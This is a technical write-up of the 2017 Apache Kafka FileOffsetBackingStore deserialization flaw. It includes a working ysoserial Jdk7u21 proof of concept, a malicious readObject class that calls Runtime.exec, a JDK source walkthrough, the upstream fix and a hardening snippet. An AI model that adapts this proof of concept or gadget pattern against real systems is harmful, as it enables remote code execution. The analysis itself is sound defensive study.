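Kafka Deserialization Vulnerability Analysis

1. Introduction to the Kafka deserialization vulnerability

Apache Kafka is an open-source stream-processing platform developed under the Apache Software Foundation and written in Scala and Java. The project aims to provide a unified, high-throughput, low-latency platform for real-time data processing, and it is widely used as middleware.

On July 19, 2017 it was disclosed that the connect-runtime package of Apache Kafka contains a deserialization vulnerability that is triggered when the FileOffsetBackingStore class runs, and that it can lead to remote code execution.

Kafka source code on GitHub: https://github.com/apache/kafka/

Kafka official documentation: http://kafka.apache.org/

Official vulnerability advisory: http://seclists.org/oss-sec/2017/q3/184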

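2. Vulnerability overview

Kafka contains a dangerous class that calls readObject without any validation. If an application built on the framework uses this class, instantiating it after setting the relevant configuration parameters can lead to remote code execution.

Affected versions: Apache Kafka 0.10.0.0 -> 0.11.0.0 (as of 2017/09/13, the latest release is 0.11.0.0)

Because this code path is uncommon in real production environments, the vulnerability is rated medium-to-low severity based on its impact.

3. Vulnerability details

Reproducing the vulnerability (POC)

Official POC: http://seclists.org/oss-sec/2017/q3/184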

import junit.framework.TestCase;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.Jdk7u21;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

// Class wrapper added so that the snippet compiles; the class name is arbitrary.
public class KafkaDeserTest extends TestCase {

    public void test_Kafka_Deser() throws Exception {

        StandaloneConfig config;

        String projectDir = System.getProperty("user.dir");

        // Build the malicious object with the ysoserial Jdk7u21 payload
        Jdk7u21 jdk7u21 = new Jdk7u21();
        Object o = jdk7u21.getObject("touch vul");

        byte[] ser = serialize(o);

        // Write the serialized payload to the file that will be used as the offset store
        File tempFile = new File(projectDir + "/payload.ser");
        FileUtils.writeByteArrayToFile(tempFile, ser);

        Map<String, String> props = new HashMap<String, String>();
        props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG,
                tempFile.getAbsolutePath());
        props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG,
                "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG,
                "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG,
                "org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG,
                "org.apache.kafka.connect.json.JsonConverter");
        config = new StandaloneConfig(props);

        // start() calls load(), which deserializes the payload file
        FileOffsetBackingStore restore = new FileOffsetBackingStore();
        restore.configure(config);
        restore.start();
    }

    private byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(bout);
        out.writeObject(object);
        out.flush();
        return bout.toByteArray();
    }
}

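About ysoserial

ysoserial is a toolkit for constructing malicious serialized objects.

GitHub: https://github.com/frohoff/ysoserial/

Because the component is not published to Maven Central, you need to clone the code locally, build it, and install it into your local Maven repository.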

git clone git@github.com:frohoff/ysoserial.git
cd ysoserial
mvn install -DskipTests

Malicious serialization code

The core of the malicious serialization code is just the following two lines:

Jdk7u21 jdk7u21 = new Jdk7u21();
Object o = jdk7u21.getObject("touch vul");

Since touch is a Linux command, on Windows I changed the code as follows so that it launches the calculator instead.

Jdk7u21 jdk7u21 = new Jdk7u21();
Object o = jdk7u21.getObject("calc.exe");

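GitHub demo: https://github.com/shiyueqi/kafka-deserialization-bug

Vulnerability analysis

The class org.apache.kafka.connect.storage.FileOffsetBackingStore performs a deserialization operation. Calling the start method of a FileOffsetBackingStore object triggers it and deserializes the malicious serialized object, which leads to code execution.

Looking back at the POC above, it first calls the configure method of the FileOffsetBackingStore object.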

@Override
public void configure(WorkerConfig config) {
    super.configure(config);
    file = new File(config.getString(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG));
}

The configure method assigns the member variable this.file to the file named in the configuration. The POC then calls the start method of the FileOffsetBackingStore object.

@Override
public synchronized void start() {
    super.start();
    log.info("Starting FileOffsetBackingStore with file {}", file);
    load();
}

The start() method in turn calls the load method.

@SuppressWarnings("unchecked")
private void load() {
    try {
        ObjectInputStream is = new ObjectInputStream(new FileInputStream(file));
        Object obj = is.readObject();
        if (!(obj instanceof HashMap))
            throw new ConnectException("Expected HashMap but found " + obj.getClass());
        Map<byte[], byte[]> raw = (Map<byte[], byte[]>) obj;
        data = new HashMap<>();
        for (Map.Entry<byte[], byte[]> mapEntry : raw.entrySet()) {
            ByteBuffer key = (mapEntry.getKey() != null) ? ByteBuffer.wrap(mapEntry.getKey()) : null;
            ByteBuffer value = (mapEntry.getValue() != null) ? ByteBuffer.wrap(mapEntry.getValue()) : null;
            data.put(key, value);
        }
        is.close();
    } catch (FileNotFoundException | EOFException e) {
        // FileNotFoundException: Ignore, may be new.
        // EOFException: Ignore, this means the file was missing or corrupt
    } catch (IOException | ClassNotFoundException e) {
        throw new ConnectException(e);
    }
}

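In load(), an ObjectInputStream is opened over this.file, so the stream is reads the contents of that file, which here is the malicious serialized object we constructed. The readObject() call that follows then deserializes that object.

During deserialization, FileOffsetBackingStore calls the readObject() method of java.io.ObjectInputStream directly, without validating the input. The instanceof HashMap check runs only after readObject() has returned, so it cannot stop code that executes during deserialization. This allows an attacker to construct a serialized object and execute malicious code.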
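
The ordering problem in load() can be reproduced without Kafka. The following is a minimal sketch, not Kafka code: LateTypeCheckDemo, Probe and loadLikeKafka are hypothetical names, the Probe class sets a harmless flag where a real gadget would do damage, and the bytes are kept in memory instead of a file. It mirrors only the shape of load(): deserialize first, check the type afterwards.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashMap;

class LateTypeCheckDemo {
    // Set by Probe.readObject; stands in for an attacker-controlled side effect.
    static boolean hookRan = false;

    // Hypothetical, harmless stand-in for a gadget class.
    static class Probe implements Serializable {
        private static final long serialVersionUID = 1L;

        private void readObject(ObjectInputStream in)
                throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            hookRan = true; // a real gadget would do something harmful here
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bout)) {
            out.writeObject(o);
        }
        return bout.toByteArray();
    }

    // Same order of operations as load(): readObject() first, instanceof check second.
    static Object loadLikeKafka(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream is = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            Object obj = is.readObject();
            if (!(obj instanceof HashMap)) {
                throw new IllegalStateException("Expected HashMap but found " + obj.getClass());
            }
            return obj;
        }
    }

    // Returns true if the type check rejected the deserialized object.
    static boolean rejectedByTypeCheck(byte[] bytes) throws Exception {
        try {
            loadLikeKafka(bytes);
            return false;
        } catch (IllegalStateException expected) {
            return true;
        }
    }

    public static void main(String[] args) throws Exception {
        boolean rejected = rejectedByTypeCheck(serialize(new Probe()));
        System.out.println("rejected by type check: " + rejected);
        System.out.println("readObject hook ran anyway: " + hookRan);
    }
}
```

Both lines print true: the object is rejected as "not a HashMap", but only after its readObject hook has already run.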

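4. Source code analysis

Overview

The core idea of malicious serialization is to construct a malicious object whose deserialization method runs while the object is being deserialized, thereby achieving remote code execution.
The code below defines a DeserializationObject class that implements readObject(); inside it, Runtime.getRuntime().exec("calc.exe") launches the calculator by running a command.

The complete code is as follows: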

static class DeserializationObject implements Serializable {
    private void readObject(ObjectInputStream input) throws IOException, ClassNotFoundException {
        input.defaultReadObject();
        Runtime.getRuntime().exec("calc.exe");
    }
}

Source code walkthrough

FileOffsetBackingStore

The code that invokes the FileOffsetBackingStore class is:

FileOffsetBackingStore restore = new FileOffsetBackingStore();
restore.configure(config);
restore.start();

The source of the configure() and start() methods of FileOffsetBackingStore is:

@Override
public void configure(WorkerConfig config) {
    super.configure(config);
    file = new File(config.getString(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG));
}

@Override
public synchronized void start() {
    super.start();
    log.info("Starting FileOffsetBackingStore with file {}", file);
    load();
}

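As shown, configure assigns the member variable this.file to the configured file, and start goes straight into load. In this attack we first construct the malicious object, serialize it, and save it to a file, then pass that file's path in the configuration handed to the configure() method of FileOffsetBackingStore.

The load() method is: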

@SuppressWarnings("unchecked")
private void load() {
    try {
        ObjectInputStream is = new ObjectInputStream(new FileInputStream(file));
        Object obj = is.readObject();
        if (!(obj instanceof HashMap))
            throw new ConnectException("Expected HashMap but found " + obj.getClass());
        Map<byte[], byte[]> raw = (Map<byte[], byte[]>) obj;
        data = new HashMap<>();
        for (Map.Entry<byte[], byte[]> mapEntry : raw.entrySet()) {
            ByteBuffer key = (mapEntry.getKey() != null) ? ByteBuffer.wrap(mapEntry.getKey()) : null;
            ByteBuffer value = (mapEntry.getValue() != null) ? ByteBuffer.wrap(mapEntry.getValue()) : null;
            data.put(key, value);
        }
        is.close();
    } catch (FileNotFoundException | EOFException e) {
        // FileNotFoundException: Ignore, may be new.
        // EOFException: Ignore, this means the file was missing or corrupt
    } catch (IOException | ClassNotFoundException e) {
        throw new ConnectException(e);
    }
}

As soon as load() is entered, it constructs an ObjectInputStream object:

ObjectInputStream is = new ObjectInputStream(new FileInputStream(file));

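The FileInputStream class

The FileInputStream constructor first obtains the file's name, then creates a file descriptor (a FileDescriptor object), and finally calls open to open the file named by the file argument for reading. The open method itself is a native method.

The method's Javadoc says the same: it opens a connection to the specified file and creates a file input stream, and a FileDescriptor object is created to represent that connection.

Source: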

/**
* Creates a <code>FileInputStream</code> by
* opening a connection to an actual file,
* the file named by the <code>File</code>
* object <code>file</code> in the file system.
* A new <code>FileDescriptor</code> object
* is created to represent this file connection.
* <p>
* First, if there is a security manager,
* its <code>checkRead</code> method is called
* with the path represented by the <code>file</code>
* argument as its argument.
* <p>
* If the named file does not exist, is a directory rather than a regular
* file, or for some other reason cannot be opened for reading then a
* <code>FileNotFoundException</code> is thrown.
*
* @param file the file to be opened for reading.
* @exception FileNotFoundException if the file does not exist,
* is a directory rather than a regular file,
* or for some other reason cannot be opened for
* reading.
* @exception SecurityException if a security manager exists and its
* <code>checkRead</code> method denies read access to the file.
* @see java.io.File#getPath()
* @see java.lang.SecurityManager#checkRead(java.lang.String)
*/

public FileInputStream(File file) throws FileNotFoundException {
String name = (file != null ? file.getPath() : null);
SecurityManager security = System.getSecurityManager();
if (security != null) {
security.checkRead(name);
}
if (name == null) {
throw new NullPointerException();
}
fd = new FileDescriptor();
fd.incrementAndGetUseCount();
open(name);
}

/**
* Opens the specified file for reading.
* @param name the name of the file
*/

private native void open(String name) throws FileNotFoundException;

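ObjectInputStream

Next, the ObjectInputStream constructor is called. It mostly performs initialization, and it also reads and verifies the serialization stream header. Source: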

/**
* Creates an ObjectInputStream that reads from the specified InputStream.
* A serialization stream header is read from the stream and verified.
* This constructor will block until the corresponding ObjectOutputStream
* has written and flushed the header.
*
* <p>If a security manager is installed, this constructor will check for
* the "enableSubclassImplementation" SerializablePermission when invoked
* directly or indirectly by the constructor of a subclass which overrides
* the ObjectInputStream.readFields or ObjectInputStream.readUnshared
* methods.
*
* @param in input stream to read from
* @throws StreamCorruptedException if the stream header is incorrect
* @throws IOException if an I/O error occurs while reading stream header
* @throws SecurityException if untrusted subclass illegally overrides
* security-sensitive methods
* @throws NullPointerException if <code>in</code> is <code>null</code>
* @see ObjectInputStream#ObjectInputStream()
* @see ObjectInputStream#readFields()
* @see ObjectOutputStream#ObjectOutputStream(OutputStream)
*/

public ObjectInputStream(InputStream in) throws IOException {
verifySubclass();
bin = new BlockDataInputStream(in);
handles = new HandleTable(10);
vlist = new ValidationList();
enableOverride = false;
readStreamHeader();
bin.setBlockDataMode(true);
}
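
The readStreamHeader() call in the constructor is where the header check described in the Javadoc happens. As a small illustration (StreamHeaderDemo and headerRejected are made-up names, not part of the JDK or Kafka), the sketch below feeds the constructor four arbitrary bytes and then the four bytes of a valid header, 0xACED followed by version 0x0005. Passing this check says nothing about whether the objects that follow are safe to deserialize.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.StreamCorruptedException;

class StreamHeaderDemo {
    // Returns true if the ObjectInputStream constructor rejects the stream header.
    static boolean headerRejected(byte[] bytes) throws IOException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            return false; // header accepted; no object has been read yet
        } catch (StreamCorruptedException e) {
            return true;  // magic number or version did not match
        }
    }

    public static void main(String[] args) throws IOException {
        byte[] notSerialized = {'t', 'e', 's', 't'};
        byte[] headerOnly = {(byte) 0xAC, (byte) 0xED, 0x00, 0x05};
        System.out.println("plain bytes rejected: " + headerRejected(notSerialized));
        System.out.println("valid header rejected: " + headerRejected(headerOnly));
    }
}
```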

readObject()

Back in the load() method called from the start() method of FileOffsetBackingStore: once the ObjectInputStream object has been constructed, load() calls

ObjectInputStream is = new ObjectInputStream(new FileInputStream(file));
Object obj = is.readObject();

This invokes the readObject() method of the ObjectInputStream class. Source:

/**
* Read an object from the ObjectInputStream. The class of the object, the
* signature of the class, and the values of the non-transient and
* non-static fields of the class and all of its supertypes are read.
* Default deserializing for a class can be overriden using the writeObject
* and readObject methods. Objects referenced by this object are read
* transitively so that a complete equivalent graph of objects is
* reconstructed by readObject.
*
* <p>The root object is completely restored when all of its fields and the
* objects it references are completely restored. At this point the object
* validation callbacks are executed in order based on their registered
* priorities. The callbacks are registered by objects (in the readObject
* special methods) as they are individually restored.
*
* <p>Exceptions are thrown for problems with the InputStream and for
* classes that should not be deserialized. All exceptions are fatal to
* the InputStream and leave it in an indeterminate state; it is up to the
* caller to ignore or recover the stream state.
*
* @throws ClassNotFoundException Class of a serialized object cannot be
* found.
* @throws InvalidClassException Something is wrong with a class used by
* serialization.
* @throws StreamCorruptedException Control information in the
* stream is inconsistent.
* @throws OptionalDataException Primitive data was found in the
* stream instead of objects.
* @throws IOException Any of the usual Input/Output related exceptions.
*/

public final Object readObject()
throws IOException, ClassNotFoundException
{

if (enableOverride) {
return readObjectOverride();
}

// if nested read, passHandle contains handle of enclosing object
int outerHandle = passHandle;
try {
Object obj = readObject0(false);
handles.markDependency(outerHandle, passHandle);
ClassNotFoundException ex = handles.lookupException(passHandle);
if (ex != null) {
throw ex;
}
if (depth == 0) {
vlist.doCallbacks();
}
return obj;
} finally {
passHandle = outerHandle;
if (closed && depth == 0) {
clear();
}
}
}

readObject() then calls the readObject0() method of ObjectInputStream.

The key source of readObject0() is:

/**
* Underlying readObject implementation.
*/

private Object readObject0(boolean unshared) throws IOException {
boolean oldMode = bin.getBlockDataMode();
if (oldMode) {
int remain = bin.currentBlockRemaining();
if (remain > 0) {
throw new OptionalDataException(remain);
} else if (defaultDataEnd) {
/*
* Fix for 4360508: stream is currently at the end of a field
* value block written via default serialization; since there
* is no terminating TC_ENDBLOCKDATA tag, simulate
* end-of-custom-data behavior explicitly.
*/

throw new OptionalDataException(true);
}
bin.setBlockDataMode(false);
}

byte tc;
while ((tc = bin.peekByte()) == TC_RESET) {
bin.readByte();
handleReset();
}

depth++;
try {
switch (tc) {
case TC_NULL:
return readNull();

case TC_REFERENCE:
return readHandle(unshared);

case TC_CLASS:
return readClass(unshared);

case TC_CLASSDESC:
case TC_PROXYCLASSDESC:
return readClassDesc(unshared);

case TC_STRING:
case TC_LONGSTRING:
return checkResolve(readString(unshared));

case TC_ARRAY:
return checkResolve(readArray(unshared));

case TC_ENUM:
return checkResolve(readEnum(unshared));

case TC_OBJECT:
return checkResolve(readOrdinaryObject(unshared));

case TC_EXCEPTION:
IOException ex = readFatalException();
throw new WriteAbortedException("writing aborted", ex);

case TC_BLOCKDATA:
case TC_BLOCKDATALONG:
if (oldMode) {
bin.setBlockDataMode(true);
bin.peek(); // force header read
throw new OptionalDataException(
bin.currentBlockRemaining());
} else {
throw new StreamCorruptedException(
"unexpected block data");
}

case TC_ENDBLOCKDATA:
if (oldMode) {
throw new OptionalDataException(true);
} else {
throw new StreamCorruptedException(
"unexpected end of block data");
}

default:
throw new StreamCorruptedException(
String.format("invalid type code: %02X", tc));
}
} finally {
depth--;
bin.setBlockDataMode(oldMode);
}
}
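
The switch above dispatches on a single type-code byte peeked from the stream. A quick way to see which branch a given value takes is to serialize it and look at the byte that follows the 4-byte stream header. This is only an illustrative sketch (TypeCodeDemo and firstTypeCode are made-up names); the TC_* constants come from java.io.ObjectStreamConstants.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamConstants;
import java.util.HashMap;

class TypeCodeDemo {
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bout)) {
            out.writeObject(o);
        }
        return bout.toByteArray();
    }

    // Bytes 0-3 are the stream header (magic + version); byte 4 is the
    // type code that readObject0() switches on for the top-level value.
    static byte firstTypeCode(Object o) throws IOException {
        return serialize(o)[4];
    }

    public static void main(String[] args) throws IOException {
        System.out.println("HashMap -> TC_OBJECT: "
                + (firstTypeCode(new HashMap<String, String>()) == ObjectStreamConstants.TC_OBJECT));
        System.out.println("String  -> TC_STRING: "
                + (firstTypeCode("text") == ObjectStreamConstants.TC_STRING));
        System.out.println("int[]   -> TC_ARRAY:  "
                + (firstTypeCode(new int[0]) == ObjectStreamConstants.TC_ARRAY));
    }
}
```

Any ordinary serializable object, including a gadget object, starts with TC_OBJECT and therefore reaches readOrdinaryObject().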

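The method switches on the type code read from the stream. Because the constructed malicious object is serialized as an ordinary object (not a String, array, enum, and so on), the case TC_OBJECT branch is taken, and readOrdinaryObject() is called next.

Source: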

/**
* Reads and returns "ordinary" (i.e., not a String, Class,
* ObjectStreamClass, array, or enum constant) object, or null if object's
* class is unresolvable (in which case a ClassNotFoundException will be
* associated with object's handle). Sets passHandle to object's assigned
* handle.
*/

private Object readOrdinaryObject(boolean unshared)
throws IOException
{

if (bin.readByte() != TC_OBJECT) {
throw new InternalError();
}

ObjectStreamClass desc = readClassDesc(false);
desc.checkDeserialize();

Object obj;
try {
obj = desc.isInstantiable() ? desc.newInstance() : null;
} catch (Exception ex) {
throw (IOException) new InvalidClassException(
desc.forClass().getName(),
"unable to create instance").initCause(ex);
}

passHandle = handles.assign(unshared ? unsharedMarker : obj);
ClassNotFoundException resolveEx = desc.getResolveException();
if (resolveEx != null) {
handles.markException(passHandle, resolveEx);
}

if (desc.isExternalizable()) {
readExternalData((Externalizable) obj, desc);
} else {
readSerialData(obj, desc);
}

handles.finish(passHandle);

if (obj != null &&
handles.lookupException(passHandle) == null &&
desc.hasReadResolveMethod())
{
Object rep = desc.invokeReadResolve(obj);
if (unshared && rep.getClass().isArray()) {
rep = cloneArray(rep);
}
if (rep != obj) {
handles.setObject(passHandle, obj = rep);
}
}

return obj;
}

This calls the readSerialData(obj, desc) method. In the source below, the key line is slotDesc.invokeReadObject(obj, this);

/**
* Reads (or attempts to skip, if obj is null or is tagged with a
* ClassNotFoundException) instance data for each serializable class of
* object in stream, from superclass to subclass. Expects that passHandle
* is set to obj's handle before this method is called.
*/

private void readSerialData(Object obj, ObjectStreamClass desc)
throws IOException
{

ObjectStreamClass.ClassDataSlot[] slots = desc.getClassDataLayout();
for (int i = 0; i < slots.length; i++) {
ObjectStreamClass slotDesc = slots[i].desc;

if (slots[i].hasData) {
if (obj != null &&
slotDesc.hasReadObjectMethod() &&
handles.lookupException(passHandle) == null)
{
SerialCallbackContext oldContext = curContext;

try {
curContext = new SerialCallbackContext(obj, slotDesc);

bin.setBlockDataMode(true);
slotDesc.invokeReadObject(obj, this);
} catch (ClassNotFoundException ex) {
/*
* In most cases, the handle table has already
* propagated a CNFException to passHandle at this
* point; this mark call is included to address cases
* where the custom readObject method has cons'ed and
* thrown a new CNFException of its own.
*/

handles.markException(passHandle, ex);
} finally {
curContext.setUsed();
curContext = oldContext;
}

/*
* defaultDataEnd may have been set indirectly by custom
* readObject() method when calling defaultReadObject() or
* readFields(); clear it to restore normal read behavior.
*/

defaultDataEnd = false;
} else {
defaultReadFields(obj, slotDesc);
}
if (slotDesc.hasWriteObjectData()) {
skipCustomData();
} else {
bin.setBlockDataMode(false);
}
} else {
if (obj != null &&
slotDesc.hasReadObjectNoDataMethod() &&
handles.lookupException(passHandle) == null)
{
slotDesc.invokeReadObjectNoData(obj);
}
}
}
}

Reflective invocation in ObjectStreamClass

Next, the invokeReadObject() method of the ObjectStreamClass class is called. Source:

/**
* Invokes the readObject method of the represented serializable class.
* Throws UnsupportedOperationException if this class descriptor is not
* associated with a class, or if the class is externalizable,
* non-serializable or does not define readObject.
*/

void invokeReadObject(Object obj, ObjectInputStream in)
throws ClassNotFoundException, IOException,
UnsupportedOperationException
{

if (readObjectMethod != null) {
try {
readObjectMethod.invoke(obj, new Object[]{ in });
} catch (InvocationTargetException ex) {
Throwable th = ex.getTargetException();
if (th instanceof ClassNotFoundException) {
throw (ClassNotFoundException) th;
} else if (th instanceof IOException) {
throw (IOException) th;
} else {
throwMiscException(th);
}
} catch (IllegalAccessException ex) {
// should not occur, as access checks have been suppressed
throw new InternalError();
}
} else {
throw new UnsupportedOperationException();
}
}

The following line is the reflective call itself.

readObjectMethod.invoke(obj, new Object[]{ in });

Now look at how readObjectMethod, a member variable of the ObjectStreamClass class, is defined. It is initialized in the ObjectStreamClass constructor, whose source is:

/**
* Creates local class descriptor representing given class.
*/

private ObjectStreamClass(final Class<?> cl) {
this.cl = cl;
name = cl.getName();
isProxy = Proxy.isProxyClass(cl);
isEnum = Enum.class.isAssignableFrom(cl);
serializable = Serializable.class.isAssignableFrom(cl);
externalizable = Externalizable.class.isAssignableFrom(cl);

Class<?> superCl = cl.getSuperclass();
superDesc = (superCl != null) ? lookup(superCl, false) : null;
localDesc = this;

if (serializable) {
AccessController.doPrivileged(new PrivilegedAction<Void>() {
public Void run() {
if (isEnum) {
suid = Long.valueOf(0);
fields = NO_FIELDS;
return null;
}
if (cl.isArray()) {
fields = NO_FIELDS;
return null;
}

suid = getDeclaredSUID(cl);
try {
fields = getSerialFields(cl);
computeFieldOffsets();
} catch (InvalidClassException e) {
serializeEx = deserializeEx =
new ExceptionInfo(e.classname, e.getMessage());
fields = NO_FIELDS;
}

if (externalizable) {
cons = getExternalizableConstructor(cl);
} else {
cons = getSerializableConstructor(cl);
writeObjectMethod = getPrivateMethod(cl, "writeObject",
new Class<?>[] { ObjectOutputStream.class },
Void.TYPE);
readObjectMethod = getPrivateMethod(cl, "readObject",
new Class<?>[] { ObjectInputStream.class },
Void.TYPE);
readObjectNoDataMethod = getPrivateMethod(
cl, "readObjectNoData", null, Void.TYPE);
hasWriteObjectData = (writeObjectMethod != null);
}
writeReplaceMethod = getInheritableMethod(
cl, "writeReplace", null, Object.class);
readResolveMethod = getInheritableMethod(
cl, "readResolve", null, Object.class);
return null;
}
});
} else {
suid = Long.valueOf(0);
fields = NO_FIELDS;
}

try {
fieldRefl = getReflector(fields, this);
} catch (InvalidClassException ex) {
// field mismatches impossible when matching local fields vs. self
throw new InternalError();
}

if (deserializeEx == null) {
if (isEnum) {
deserializeEx = new ExceptionInfo(name, "enum type");
} else if (cons == null) {
deserializeEx = new ExceptionInfo(name, "no valid constructor");
}
}
for (int i = 0; i < fields.length; i++) {
if (fields[i].getField() == null) {
defaultSerializeEx = new ExceptionInfo(
name, "unmatched serializable field(s) declared");
}
}
}

As shown, readObjectMethod is defined as follows:

readObjectMethod = getPrivateMethod(cl, "readObject",
new Class<?>[] { ObjectInputStream.class },
Void.TYPE);

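The second argument is the name of the method to be invoked reflectively, readObject; the third is that method's parameter types, a single ObjectInputStream; the last is its return type, void.

So when constructing a malicious serializable class, it is enough to implement the following method.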

private void readObject(ObjectInputStream input)
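
To make the lookup concrete, the sketch below approximates with public reflection APIs what the getPrivateMethod call appears to require: a method declared on the class itself, named readObject, taking one ObjectInputStream, returning void, private and non-static. It is an assumption-laden illustration, not the JDK's code: ReadObjectLookupDemo, findReadObject, WithHook and WrongSignature are all hypothetical names.

```java
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;

class ReadObjectLookupDemo {
    // Has the exact signature the serialization runtime looks for.
    static class WithHook implements Serializable {
        private static final long serialVersionUID = 1L;

        private void readObject(ObjectInputStream in)
                throws IOException, ClassNotFoundException {
            in.defaultReadObject();
        }
    }

    // Same name and parameter, but public: this sketch does not treat it as a hook.
    static class WrongSignature implements Serializable {
        private static final long serialVersionUID = 1L;

        public void readObject(ObjectInputStream in) {
        }
    }

    // Returns the readObject hook of cl, or null if cl declares none with the expected shape.
    static Method findReadObject(Class<?> cl) {
        try {
            Method m = cl.getDeclaredMethod("readObject", ObjectInputStream.class);
            int mods = m.getModifiers();
            boolean matches = m.getReturnType() == Void.TYPE
                    && Modifier.isPrivate(mods)
                    && !Modifier.isStatic(mods);
            return matches ? m : null;
        } catch (NoSuchMethodException e) {
            return null;
        }
    }

    public static void main(String[] args) {
        System.out.println("WithHook has hook: " + (findReadObject(WithHook.class) != null));
        System.out.println("WrongSignature has hook: " + (findReadObject(WrongSignature.class) != null));
    }
}
```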

5. Fix

The Kafka project has fixed this vulnerability; the commit is linked below.

https://github.com/apache/kafka/commit/da42977a004dc0c9d29c8c28f0f0cd2c06b889ef


The fix introduces Kafka's own org.apache.kafka.connect.util.SafeObjectInputStream to replace the JDK's java.io.ObjectInputStream class.

SafeObjectInputStream extends ObjectInputStream, adds a blacklist of classes, and in resolveClass uses isBlacklisted() to filter out blacklisted classes.
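
The general technique, rejecting classes in resolveClass before they are instantiated, can be sketched as follows. This is not Kafka's SafeObjectInputStream: FilteringDemo, FilteringObjectInputStream and the blocked-prefix set are hypothetical, and java.util.ArrayList is blocked here only so that the example is easy to run.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.Set;

class FilteringDemo {
    // Hypothetical deny-list stream: refuses to resolve classes whose names
    // start with one of the blocked prefixes.
    static class FilteringObjectInputStream extends ObjectInputStream {
        private final Set<String> blockedPrefixes;

        FilteringObjectInputStream(InputStream in, Set<String> blockedPrefixes) throws IOException {
            super(in);
            this.blockedPrefixes = blockedPrefixes;
        }

        private boolean isBlocked(String className) {
            for (String prefix : blockedPrefixes) {
                if (className.startsWith(prefix)) {
                    return true;
                }
            }
            return false;
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            // Called before the object is instantiated and before its readObject hook runs.
            String name = desc.getName();
            if (isBlocked(name)) {
                throw new InvalidClassException(name, "class is on the deny list");
            }
            return super.resolveClass(desc);
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bout)) {
            out.writeObject(o);
        }
        return bout.toByteArray();
    }

    static Object read(byte[] bytes, Set<String> blocked) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in =
                     new FilteringObjectInputStream(new ByteArrayInputStream(bytes), blocked)) {
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        Set<String> blocked = Collections.singleton("java.util.ArrayList");
        System.out.println("HashMap read: " + read(serialize(new HashMap<String, String>()), blocked));
        try {
            read(serialize(new ArrayList<String>()), blocked);
        } catch (InvalidClassException e) {
            System.out.println("blocked: " + e.classname);
        }
    }
}
```

A deny list only stops gadget classes that are already known. An allow list that accepts just the expected types (for this file, HashMap and byte[]) is the stricter variant of the same override.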

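The fix is expected to ship in version 0.11.0.1.

6. Preventing the JVM from executing external commands

Strictly speaking, Java has relatively few security problems; most of those that do appear use reflection and ultimately call Runtime.exec(String cmd) to run an external command. If the JVM can be prevented from executing external commands, the impact of unknown vulnerabilities drops considerably and the JVM becomes much safer.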

// Requires: import java.security.Permission;
SecurityManager originalSecurityManager = System.getSecurityManager();
if (originalSecurityManager == null) {
    // Install our own SecurityManager
    SecurityManager sm = new SecurityManager() {
        private void check(Permission perm) {
            // Deny exec
            if (perm instanceof java.io.FilePermission) {
                String actions = perm.getActions();
                if (actions != null && actions.contains("execute")) {
                    throw new SecurityException("execute denied!");
                }
            }
            // Deny installing a new SecurityManager
            if (perm instanceof java.lang.RuntimePermission) {
                String name = perm.getName();
                if (name != null && name.contains("setSecurityManager")) {
                    throw new SecurityException(
                            "System.setSecurityManager denied!");
                }
            }
        }

        @Override
        public void checkPermission(Permission perm) {
            check(perm);
        }

        @Override
        public void checkPermission(Permission perm, Object context) {
            check(perm);
        }
    };
    System.setSecurityManager(sm);
}

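As shown above, a short piece of Java code is enough to block the execution of external programs.

Preventing the JVM from executing external commands is a simple and effective way to improve JVM security. Consider also strengthening the detection of Runtime.exec-related code during code security scanning.

7. References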

  1. https://github.com/apache/kafka/
  2. http://kafka.apache.org/
  3. http://seclists.org/oss-sec/2017/q3/184
  4. http://www.openwall.com/lists/oss-security/2017/07/19/1
  5. http://bobao.360.cn/learning/detail/4190.html
  6. http://seclist.us/ysoserial-v-0-0-3-a-proof-of-concept-tool-for-generating-payloads-that-exploit-unsafe-java-object-deserialization.html
  7. https://github.com/frohoff/ysoserial/
  8. https://github.com/apache/kafka/commit/da42977a004dc0c9d29c8c28f0f0cd2c06b889ef